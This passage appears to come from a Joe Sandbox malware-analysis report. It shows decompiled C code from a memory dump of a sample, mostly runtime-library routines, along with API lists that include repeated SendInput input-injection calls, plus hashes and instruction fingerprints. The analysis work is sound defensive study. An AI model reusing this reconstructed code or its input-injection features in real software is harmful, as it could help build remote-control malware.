                    								_t101 = E00445B29(_t87, _t66 & _t87);
                    								_pop(_t87);
                    								__eflags = _t101;
                    								if(_t101 == 0) {
                    									goto L35;
                    								}
                    								 *_t101 = 0xdddd;
                    								L28:
                    								_t101 =  &(_t101[4]);
                    								goto L30;
                    							}
                    							__eflags = _t96 - _t87;
                    							asm("sbb eax, eax");
                    							E00456BA0();
                    							_t101 = _t107;
                    							__eflags = _t101;
                    							if(_t101 == 0) {
                    								goto L35;
                    							}
                    							 *_t101 = 0xcccc;
                    							goto L28;
                    						}
                    						_t70 = _a28;
                    						if(_t70 == 0) {
                    							goto L37;
                    						}
                    						_t125 = _t105 - _t70;
                    						if(_t105 > _t70) {
                    							goto L36;
                    						}
                    						_t71 = E004485C2(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                    						_t105 = _t71;
                    						if(_t71 != 0) {
                    							goto L37;
                    						}
                    						goto L36;
                    					}
                    					asm("sbb eax, eax");
                    					_t72 = _t54 & _t95 + 0x00000008;
                    					_t85 = _t95 + 8;
                    					if((_t54 & _t95 + 0x00000008) > 0x400) {
                    						__eflags = _t95 - _t85;
                    						asm("sbb eax, eax");
                    						_t81 = E00445B29(_t85, _t72 & _t85);
                    						_pop(_t85);
                    						__eflags = _t81;
                    						if(__eflags == 0) {
                    							goto L36;
                    						}
                    						 *_t81 = 0xdddd;
                    						L12:
                    						_t81 =  &(_t81[4]);
                    						goto L14;
                    					}
                    					asm("sbb eax, eax");
                    					E00456BA0();
                    					_t81 = _t107;
                    					if(_t81 == 0) {
                    						goto L36;
                    					}
                    					 *_t81 = 0xcccc;
                    					goto L12;
                    				}
                    			}


























                    0x0044a65d
                    0x0044a65e
                    0x0044a65f
                    0x0044a666
                    0x0044a66a
                    0x0044a66b
                    0x0044a671
                    0x0044a677
                    0x0044a67d
                    0x0044a680
                    0x0044a680
                    0x0044a683
                    0x0044a685
                    0x0044a685
                    0x0044a683
                    0x0044a687
                    0x0044a68c
                    0x0044a693
                    0x0044a696
                    0x0044a696
                    0x0044a6b2
                    0x0044a6b8
                    0x0044a6bd
                    0x0044a850
                    0x0044a863
                    0x0044a6c3
                    0x0044a6c3
                    0x0044a6c6
                    0x0044a6cb
                    0x0044a6cf
                    0x0044a723
                    0x0044a723
                    0x0044a725
                    0x0044a727
                    0x0044a845
                    0x0044a845
                    0x0044a847
                    0x0044a848
                    0x00000000
                    0x0044a84e
                    0x0044a738
                    0x0044a73e
                    0x0044a740
                    0x00000000
                    0x00000000
                    0x0044a746
                    0x0044a758
                    0x0044a75d
                    0x0044a761
                    0x00000000
                    0x00000000
                    0x0044a76e
                    0x0044a7a8
                    0x0044a7ab
                    0x0044a7ae
                    0x0044a7b0
                    0x0044a7b2
                    0x0044a7b4
                    0x0044a800
                    0x0044a800
                    0x0044a802
                    0x0044a802
                    0x0044a804
                    0x0044a83e
                    0x0044a83f
                    0x00000000
                    0x0044a844
                    0x0044a818
                    0x0044a81d
                    0x0044a81f
                    0x00000000
                    0x00000000
                    0x0044a823
                    0x0044a824
                    0x0044a825
                    0x0044a828
                    0x0044a864
                    0x0044a867
                    0x0044a82a
                    0x0044a82a
                    0x0044a82b
                    0x0044a82b
                    0x0044a838
                    0x0044a83a
                    0x0044a83c
                    0x0044a86d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044a83c
                    0x0044a7b6
                    0x0044a7b9
                    0x0044a7bb
                    0x0044a7bd
                    0x0044a7bf
                    0x0044a7c2
                    0x0044a7c7
                    0x0044a7e2
                    0x0044a7e4
                    0x0044a7ee
                    0x0044a7f0
                    0x0044a7f1
                    0x0044a7f3
                    0x00000000
                    0x00000000
                    0x0044a7f5
                    0x0044a7fb
                    0x0044a7fb
                    0x00000000
                    0x0044a7fb
                    0x0044a7c9
                    0x0044a7cb
                    0x0044a7cf
                    0x0044a7d4
                    0x0044a7d6
                    0x0044a7d8
                    0x00000000
                    0x00000000
                    0x0044a7da
                    0x00000000
                    0x0044a7da
                    0x0044a770
                    0x0044a775
                    0x00000000
                    0x00000000
                    0x0044a77b
                    0x0044a77d
                    0x00000000
                    0x00000000
                    0x0044a794
                    0x0044a799
                    0x0044a79d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044a7a3
                    0x0044a6d6
                    0x0044a6d8
                    0x0044a6da
                    0x0044a6e2
                    0x0044a701
                    0x0044a703
                    0x0044a70d
                    0x0044a70f
                    0x0044a710
                    0x0044a712
                    0x00000000
                    0x00000000
                    0x0044a718
                    0x0044a71e
                    0x0044a71e
                    0x00000000
                    0x0044a71e
                    0x0044a6e6
                    0x0044a6ea
                    0x0044a6ef
                    0x0044a6f3
                    0x00000000
                    0x00000000
                    0x0044a6f9
                    0x00000000
                    0x0044a6f9

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E3E4,0043E3E4,?,?,?,0044A8A9,00000001,00000001,A5E85006), ref: 0044A6B2
                    • __alloca_probe_16.LIBCMT ref: 0044A6EA
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0044A8A9,00000001,00000001,A5E85006,?,?,?), ref: 0044A738
                    • __alloca_probe_16.LIBCMT ref: 0044A7CF
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044A832
                    • __freea.LIBCMT ref: 0044A83F
                      • Part of subcall function 00445B29: RtlAllocateHeap.NTDLL(00000000,00434CD9,?,?,00438257,?,?,pth_unenc,?,?,0040DC6B,00434CD9,?,?,?,?), ref: 00445B5B
                    • __freea.LIBCMT ref: 0044A848
                    • __freea.LIBCMT ref: 0044A86D
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 3864826663-0
                    • Opcode ID: 17378aba0da208c29f29485abc2cbd8ff484f830270012aa519c82d57839a653
                    • Instruction ID: 200c398f04587077ef9d68c288f8bdb894f18c00b6685685f79489e1e18d2c23
                    • Opcode Fuzzy Hash: 17378aba0da208c29f29485abc2cbd8ff484f830270012aa519c82d57839a653
                    • Instruction Fuzzy Hash: C3510372640206AFFB259F61DC42EBF77A9EB44754F15062EFC04D6240EB38DC61C6AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419461
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419482
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004194A2
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004194B6
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004194CC
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004194E9
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419504
                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419520
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: InputSend
                    • String ID:
                    • API String ID: 3431551938-0
                    • Opcode ID: 28c2730edff0675d2730ab7ea153cdef43f24576df35cceb17da85594878adb3
                    • Instruction ID: 8cdba4224b586a99d3670157b3bf313c83546f269afd36b5f146e30d1c1d0ee6
                    • Opcode Fuzzy Hash: 28c2730edff0675d2730ab7ea153cdef43f24576df35cceb17da85594878adb3
                    • Instruction Fuzzy Hash: 60316171558309AEE311CF51D941BEBBBDCEF98B54F00080FF6809A191D2A699C98BA7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00450435(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t53;
                    				void _t57;
                    				intOrPtr _t58;
                    				intOrPtr _t59;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				signed int _t64;
                    				char _t92;
                    				char _t100;
                    				void* _t101;
                    				signed int _t104;
                    				void* _t107;
                    				void* _t121;
                    				char* _t123;
                    				signed int _t127;
                    				intOrPtr* _t132;
                    				void* _t133;
                    				intOrPtr* _t134;
                    				signed int _t135;
                    				signed int _t136;
                    				signed int _t137;
                    				signed int _t138;
                    				char* _t139;
                    
                    				_t121 = __edx;
                    				_t100 = _a4;
                    				_v28 = _t100;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                    					_v16 = 1;
                    					_t53 = E004454E5(_t101, 1, 0x50);
                    					_v8 = _t53;
                    					if(_t53 != 0) {
                    						_t104 = 0x14;
                    						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                    						_t132 = E00445B29(0, 4);
                    						_t127 = 0;
                    						_v12 = _t132;
                    						E00446172(0);
                    						_pop(_t107);
                    						if(_t132 != 0) {
                    							 *_t132 = 0;
                    							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                    								_t133 = _v8;
                    								_t57 =  *0x470188; // 0x470180
                    								 *_t133 = _t57;
                    								_t58 =  *0x47018c; // 0x47165c
                    								 *((intOrPtr*)(_t133 + 4)) = _t58;
                    								_t59 =  *0x470190; // 0x47165c
                    								 *((intOrPtr*)(_t133 + 8)) = _t59;
                    								_t60 =  *0x4701b8; // 0x470184
                    								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                    								_t61 =  *0x4701bc; // 0x471660
                    								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                    								L19:
                    								 *_v12 = 1;
                    								if(_t127 != 0) {
                    									 *_t127 = 1;
                    								}
                    								goto L21;
                    							}
                    							_t134 = E00445B29(_t107, 4);
                    							_v20 = _t134;
                    							E00446172(0);
                    							if(_t134 == 0) {
                    								L11:
                    								E00446172(_v8);
                    								E00446172(_v12);
                    								return _v16;
                    							}
                    							 *_t134 = 0;
                    							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                    							_t135 = E00452884(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
                    							_t136 = _t135 | E00452884(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
                    							_v16 = _v8 + 8;
                    							_t137 = _t136 | E00452884(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
                    							_t138 = _t137 | E00452884(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
                    							if((E00452884(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
                    								_t123 =  *_v16;
                    								while( *_t123 != 0) {
                    									_t92 =  *_t123;
                    									if(_t92 < 0x30 || _t92 > 0x39) {
                    										if(_t92 != 0x3b) {
                    											goto L16;
                    										}
                    										_t139 = _t123;
                    										do {
                    											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                    											_t139 = _t139 + 1;
                    										} while ( *_t139 != 0);
                    									} else {
                    										 *_t123 = _t92 - 0x30;
                    										L16:
                    										_t123 = _t123 + 1;
                    									}
                    								}
                    								_t127 = _v20;
                    								_t133 = _v8;
                    								goto L19;
                    							}
                    							E004503CC(_v8);
                    							_v16 = _v16 | 0xffffffff;
                    							goto L11;
                    						}
                    						E00446172(_v8);
                    						return 1;
                    					}
                    					return 1;
                    				} else {
                    					_t127 = 0;
                    					_v12 = 0;
                    					_t133 = 0x470188;
                    					L21:
                    					_t64 =  *(_t100 + 0x80);
                    					if(_t64 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t64 | 0xffffffff) == 0) {
                    							E00446172( *((intOrPtr*)(_t100 + 0x7c)));
                    							E00446172( *(_t100 + 0x88));
                    						}
                    					}
                    					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                    					 *(_t100 + 0x80) = _t127;
                    					 *(_t100 + 0x88) = _t133;
                    					return 0;
                    				}
                    			}



































                    0x00450435
                    0x0045043e
                    0x00450445
                    0x00450448
                    0x00450451
                    0x00450470
                    0x00450473
                    0x00450478
                    0x0045047f
                    0x00450492
                    0x00450493
                    0x0045049c
                    0x0045049e
                    0x004504a1
                    0x004504a4
                    0x004504aa
                    0x004504ad
                    0x004504c0
                    0x004504c8
                    0x00450622
                    0x00450625
                    0x0045062a
                    0x0045062c
                    0x00450631
                    0x00450634
                    0x00450639
                    0x0045063c
                    0x00450641
                    0x00450644
                    0x00450649
                    0x004505b2
                    0x004505b8
                    0x004505bc
                    0x004505be
                    0x004505be
                    0x00000000
                    0x004505bc
                    0x004504d5
                    0x004504d8
                    0x004504db
                    0x004504e4
                    0x00450579
                    0x0045057c
                    0x00450585
                    0x00000000
                    0x0045058e
                    0x004504ed
                    0x004504f2
                    0x00450506
                    0x0045051a
                    0x00450526
                    0x00450534
                    0x0045054e
                    0x0045056a
                    0x00450594
                    0x004505a7
                    0x00450598
                    0x0045059c
                    0x0045060f
                    0x00000000
                    0x00000000
                    0x00450611
                    0x00450613
                    0x00450616
                    0x00450618
                    0x0045061b
                    0x004505a2
                    0x004505a4
                    0x004505a6
                    0x004505a6
                    0x004505a6
                    0x0045059c
                    0x004505ac
                    0x004505af
                    0x00000000
                    0x004505af
                    0x0045056f
                    0x00450574
                    0x00000000
                    0x00450578
                    0x004504b2
                    0x00000000
                    0x004504ba
                    0x00000000
                    0x0045045b
                    0x0045045b
                    0x0045045d
                    0x00450460
                    0x004505c0
                    0x004505c0
                    0x004505c8
                    0x004505ca
                    0x004505ca
                    0x004505d2
                    0x004505d7
                    0x004505db
                    0x004505e0
                    0x004505eb
                    0x004505f1
                    0x004505db
                    0x004505f5
                    0x004505fa
                    0x00450600
                    0x00000000
                    0x00450600

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 4e1b8bc03dc8c8a8f506b53cab4832ba891b6fe6f7743d2f9c178a224e559608
                    • Instruction ID: 66e708f295d9b052de057149a978877aee53c017743239df79869f114522dce9
                    • Opcode Fuzzy Hash: 4e1b8bc03dc8c8a8f506b53cab4832ba891b6fe6f7743d2f9c178a224e559608
                    • Instruction Fuzzy Hash: 9D61FE76900209AFDB20CF69C841BAABBF5EB45311F10416BED48EB382E7349D46CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E00448D74(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				int _v8;
                    				int _v12;
                    				int _v16;
                    				int _v20;
                    				signed int _v56;
                    				char _v268;
                    				intOrPtr _v272;
                    				char _v276;
                    				char _v312;
                    				char _v316;
                    				void* __ebp;
                    				void* _t36;
                    				signed int _t38;
                    				signed int _t42;
                    				signed int _t50;
                    				void* _t54;
                    				void* _t56;
                    				signed int* _t61;
                    				intOrPtr _t71;
                    				void* _t78;
                    				signed int _t85;
                    				signed int _t87;
                    				signed int _t89;
                    				int _t93;
                    				char** _t96;
                    				signed int _t100;
                    				signed int _t101;
                    				signed int _t106;
                    				signed int _t107;
                    				intOrPtr _t116;
                    				intOrPtr _t118;
                    
                    				_t88 = __edi;
                    				_t96 = E004487DE();
                    				_t1 =  &_v8; // 0x45e224
                    				_v8 = 0;
                    				_v12 = 0;
                    				_v16 = 0;
                    				_t36 = E0044883C(_t1);
                    				_pop(_t78);
                    				if(_t36 != 0) {
                    					L19:
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E0043B6DD();
                    					asm("int3");
                    					_t106 = _t107;
                    					_t38 =  *0x47000c; // 0xc3a97826
                    					_v56 = _t38 ^ _t106;
                    					 *0x470344 =  *0x470344 | 0xffffffff;
                    					 *0x470338 =  *0x470338 | 0xffffffff;
                    					_push(0);
                    					_push(_t96);
                    					_t77 = "TZ";
                    					_t89 = 0;
                    					 *0x471758 = 0;
                    					_t42 = E0043BAA5(__eflags,  &_v316,  &_v312, 0x100, "TZ");
                    					__eflags = _t42;
                    					if(_t42 != 0) {
                    						__eflags = _t42 - 0x22;
                    						if(_t42 == 0x22) {
                    							_t101 = E00445B29(_t78, _v272);
                    							__eflags = _t101;
                    							if(__eflags != 0) {
                    								_t50 = E0043BAA5(__eflags,  &_v276, _t101, _v272, _t77);
                    								__eflags = _t50;
                    								if(_t50 == 0) {
                    									E00446172(0);
                    									_t89 = _t101;
                    								} else {
                    									_push(_t101);
                    									goto L25;
                    								}
                    							} else {
                    								_push(0);
                    								L25:
                    								E00446172();
                    							}
                    						}
                    					} else {
                    						_t89 =  &_v268;
                    					}
                    					asm("sbb esi, esi");
                    					_t100 =  ~(_t89 -  &_v268) & _t89;
                    					__eflags = _t89;
                    					if(__eflags == 0) {
                    						L33:
                    						E00448D74(_t77, _t89, _t100, __eflags);
                    					} else {
                    						__eflags =  *_t89;
                    						if(__eflags == 0) {
                    							goto L33;
                    						} else {
                    							_push(_t89);
                    							E00448B9F(_t77, _t89, _t100, __eflags);
                    						}
                    					}
                    					E00446172(_t100);
                    					__eflags = _v12 ^ _t106;
                    					return E004349BB(_v12 ^ _t106);
                    				} else {
                    					_t54 = E004487E4( &_v12);
                    					_pop(_t78);
                    					if(_t54 != 0) {
                    						goto L19;
                    					} else {
                    						_t56 = E00448810( &_v16);
                    						_pop(_t78);
                    						if(_t56 != 0) {
                    							goto L19;
                    						} else {
                    							E00446172( *0x471750);
                    							 *0x471750 = 0;
                    							 *_t107 = 0x471760;
                    							if(GetTimeZoneInformation(??) != 0xffffffff) {
                    								_t85 =  *0x471760 * 0x3c;
                    								_t87 =  *0x4717b4; // 0x0
                    								_push(__edi);
                    								 *0x471758 = 1;
                    								_v8 = _t85;
                    								_t116 =  *0x4717a6; // 0x0
                    								if(_t116 != 0) {
                    									_v8 = _t85 + _t87 * 0x3c;
                    								}
                    								_t118 =  *0x4717fa; // 0x0
                    								if(_t118 == 0) {
                    									L9:
                    									_v12 = 0;
                    									_v16 = 0;
                    								} else {
                    									_t71 =  *0x471808; // 0x0
                    									if(_t71 == 0) {
                    										goto L9;
                    									} else {
                    										_v12 = 1;
                    										_v16 = (_t71 - _t87) * 0x3c;
                    									}
                    								}
                    								_t93 = E004456F8(0, _t87);
                    								if(WideCharToMultiByte(_t93, 0, 0x471764, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                    									 *( *_t96) = 0;
                    								} else {
                    									( *_t96)[0x3f] = 0;
                    								}
                    								if(WideCharToMultiByte(_t93, 0, 0x4717b8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                    									 *(_t96[1]) = 0;
                    								} else {
                    									_t96[1][0x3f] = 0;
                    								}
                    							}
                    							 *(E004487D8()) = _v8;
                    							 *(E004487CC()) = _v12;
                    							_t61 = E004487D2();
                    							 *_t61 = _v16;
                    							return _t61;
                    						}
                    					}
                    				}
                    			}


































                    0x00448d74
                    0x00448d83
                    0x00448d87
                    0x00448d8a
                    0x00448d8e
                    0x00448d91
                    0x00448d94
                    0x00448d99
                    0x00448d9c
                    0x00448ec4
                    0x00448ec4
                    0x00448ec5
                    0x00448ec6
                    0x00448ec7
                    0x00448ec8
                    0x00448ec9
                    0x00448ece
                    0x00448ed2
                    0x00448eda
                    0x00448ee1
                    0x00448ee4
                    0x00448ef1
                    0x00448ef8
                    0x00448ef9
                    0x00448efb
                    0x00448f00
                    0x00448f0f
                    0x00448f16
                    0x00448f1e
                    0x00448f20
                    0x00448f2a
                    0x00448f2d
                    0x00448f3a
                    0x00448f3d
                    0x00448f3f
                    0x00448f58
                    0x00448f60
                    0x00448f62
                    0x00448f68
                    0x00448f6d
                    0x00448f64
                    0x00448f64
                    0x00000000
                    0x00448f64
                    0x00448f41
                    0x00448f41
                    0x00448f42
                    0x00448f42
                    0x00448f42
                    0x00448f6f
                    0x00448f22
                    0x00448f22
                    0x00448f22
                    0x00448f7c
                    0x00448f7e
                    0x00448f80
                    0x00448f82
                    0x00448f92
                    0x00448f92
                    0x00448f84
                    0x00448f84
                    0x00448f87
                    0x00000000
                    0x00448f89
                    0x00448f89
                    0x00448f8a
                    0x00448f8f
                    0x00448f87
                    0x00448f98
                    0x00448fa3
                    0x00448fae
                    0x00448da2
                    0x00448da6
                    0x00448dab
                    0x00448dae
                    0x00000000
                    0x00448db4
                    0x00448db8
                    0x00448dbd
                    0x00448dc0
                    0x00000000
                    0x00448dc6
                    0x00448dcc
                    0x00448dd1
                    0x00448dd7
                    0x00448de7
                    0x00448ded
                    0x00448df4
                    0x00448dfa
                    0x00448dfe
                    0x00448e04
                    0x00448e07
                    0x00448e0e
                    0x00448e15
                    0x00448e15
                    0x00448e18
                    0x00448e1f
                    0x00448e37
                    0x00448e37
                    0x00448e3a
                    0x00448e21
                    0x00448e21
                    0x00448e28
                    0x00000000
                    0x00448e2a
                    0x00448e2c
                    0x00448e32
                    0x00448e32
                    0x00448e28
                    0x00448e42
                    0x00448e5e
                    0x00448e6e
                    0x00448e65
                    0x00448e67
                    0x00448e67
                    0x00448e8c
                    0x00448e9e
                    0x00448e93
                    0x00448e96
                    0x00448e96
                    0x00448e8c
                    0x00448ea8
                    0x00448eb2
                    0x00448eb7
                    0x00448ebc
                    0x00448ec3
                    0x00448ec3
                    0x00448dc0
                    0x00448dae

                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045E224), ref: 00448DDE
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00471764,000000FF,00000000,0000003F,00000000,?,?), ref: 00448E56
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004717B8,000000FF,?,0000003F,00000000,?), ref: 00448E83
                    • _free.LIBCMT ref: 00448DCC
                      • Part of subcall function 00446172: RtlFreeHeap.NTDLL(00000000,00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000), ref: 00446188
                      • Part of subcall function 00446172: GetLastError.KERNEL32(00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000,00000000), ref: 0044619A
                    • _free.LIBCMT ref: 00448F98
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: $E
                    • API String ID: 1286116820-3852530544
                    • Opcode ID: 8bc3b126c25954e53d20d0d5b63e80c7a7322e2a17f85fffa1088e6ba79f2ae9
                    • Instruction ID: ea687901d0e70d5abf0af401af45dc2fefd00c6e46572168acb5417c50c66468
                    • Opcode Fuzzy Hash: 8bc3b126c25954e53d20d0d5b63e80c7a7322e2a17f85fffa1088e6ba79f2ae9
                    • Instruction Fuzzy Hash: A751E771900219EFE714EF698C819AEB7BCEF41754B20026FE554E32A1EF389D41C758
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0045662A(signed int __edx, intOrPtr _a4, intOrPtr _a8, char _a12) {
                    				int _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t16;
                    				signed int _t17;
                    				int _t20;
                    				signed int _t21;
                    				int _t23;
                    				signed int _t25;
                    				int _t28;
                    				intOrPtr* _t30;
                    				int _t34;
                    				int _t35;
                    				void* _t36;
                    				intOrPtr* _t37;
                    				intOrPtr* _t38;
                    				int _t46;
                    				void* _t54;
                    				void* _t56;
                    				signed int _t58;
                    				int _t61;
                    				int _t63;
                    				void* _t64;
                    				void* _t65;
                    				void* _t66;
                    
                    				_t58 = __edx;
                    				_t59 = _a4;
                    				_t61 = 0;
                    				_t16 = E0044BCFB(_a4, 0, 0, 1);
                    				_v20 = _t16;
                    				_v16 = __edx;
                    				_t65 = _t64 + 0x10;
                    				if((_t16 & __edx) != 0xffffffff) {
                    					_t17 = E0044BCFB(_t59, 0, 0, 2);
                    					_t66 = _t65 + 0x10;
                    					_t51 = _t17 & __edx;
                    					__eflags = (_t17 & __edx) - 0xffffffff;
                    					if((_t17 & __edx) == 0xffffffff) {
                    						goto L1;
                    					}
                    					_t46 = _a8 - _t17;
                    					__eflags = _t46;
                    					_t5 =  &_a12; // 0x455554
                    					_t20 =  *_t5;
                    					asm("sbb eax, edx");
                    					_v8 = _t20;
                    					if(__eflags < 0) {
                    						L24:
                    						__eflags = _t20 - _t61;
                    						if(__eflags > 0) {
                    							L19:
                    							_t13 =  &_v20; // 0x455554
                    							_t21 = E0044BCFB(_t59,  *_t13, _v16, _t61);
                    							__eflags = (_t21 & _t58) - 0xffffffff;
                    							if((_t21 & _t58) != 0xffffffff) {
                    								_t23 = 0;
                    								__eflags = 0;
                    								L31:
                    								return _t23;
                    							}
                    							L20:
                    							_t23 =  *((intOrPtr*)(E0043FFBD()));
                    							goto L31;
                    						}
                    						if(__eflags < 0) {
                    							L27:
                    							_t14 =  &_a12; // 0x455554
                    							_t25 = E0044BCFB(_t59, _a8,  *_t14, _t61);
                    							_t66 = _t66 + 0x10;
                    							__eflags = (_t25 & _t58) - 0xffffffff;
                    							if((_t25 & _t58) == 0xffffffff) {
                    								goto L20;
                    							}
                    							_t28 = SetEndOfFile(E0044FEA8(_t59));
                    							__eflags = _t28;
                    							if(_t28 != 0) {
                    								goto L19;
                    							}
                    							 *((intOrPtr*)(E0043FFBD())) = 0xd;
                    							_t30 = E0043FFAA();
                    							 *_t30 = GetLastError();
                    							goto L20;
                    						}
                    						__eflags = _t46 - _t61;
                    						if(_t46 >= _t61) {
                    							goto L19;
                    						}
                    						goto L27;
                    					}
                    					if(__eflags > 0) {
                    						L6:
                    						_t63 = E004454E5(_t51, 0x1000, 1);
                    						_pop(_t54);
                    						__eflags = _t63;
                    						if(_t63 != 0) {
                    							_v12 = E00443CF1(_t54, _t59, 0x8000);
                    							_t34 = _v8;
                    							_pop(_t56);
                    							do {
                    								__eflags = _t34;
                    								if(__eflags < 0) {
                    									L13:
                    									_t35 = _t46;
                    									L14:
                    									_t36 = E0044B446(_t46, _t59, _t63, _t59, _t63, _t35);
                    									_t66 = _t66 + 0xc;
                    									__eflags = _t36 - 0xffffffff;
                    									if(_t36 == 0xffffffff) {
                    										_t37 = E0043FFAA();
                    										__eflags =  *_t37 - 5;
                    										if( *_t37 == 5) {
                    											 *((intOrPtr*)(E0043FFBD())) = 0xd;
                    										}
                    										L23:
                    										_t38 = E0043FFBD();
                    										E00446172(_t63);
                    										_t23 =  *_t38;
                    										goto L31;
                    									}
                    									asm("cdq");
                    									_t46 = _t46 - _t36;
                    									_t34 = _v8;
                    									asm("sbb eax, edx");
                    									_v8 = _t34;
                    									__eflags = _t34;
                    									if(__eflags > 0) {
                    										L12:
                    										_t35 = 0x1000;
                    										goto L14;
                    									}
                    									if(__eflags < 0) {
                    										break;
                    									}
                    									goto L17;
                    								}
                    								if(__eflags > 0) {
                    									goto L12;
                    								}
                    								__eflags = _t46 - 0x1000;
                    								if(_t46 < 0x1000) {
                    									goto L13;
                    								}
                    								goto L12;
                    								L17:
                    								__eflags = _t46;
                    							} while (_t46 != 0);
                    							E00443CF1(_t56, _t59, _v12);
                    							E00446172(_t63);
                    							_t66 = _t66 + 0xc;
                    							_t61 = 0;
                    							__eflags = 0;
                    							goto L19;
                    						}
                    						 *((intOrPtr*)(E0043FFBD())) = 0xc;
                    						goto L23;
                    					}
                    					__eflags = _t46;
                    					if(_t46 <= 0) {
                    						goto L24;
                    					}
                    					goto L6;
                    				}
                    				L1:
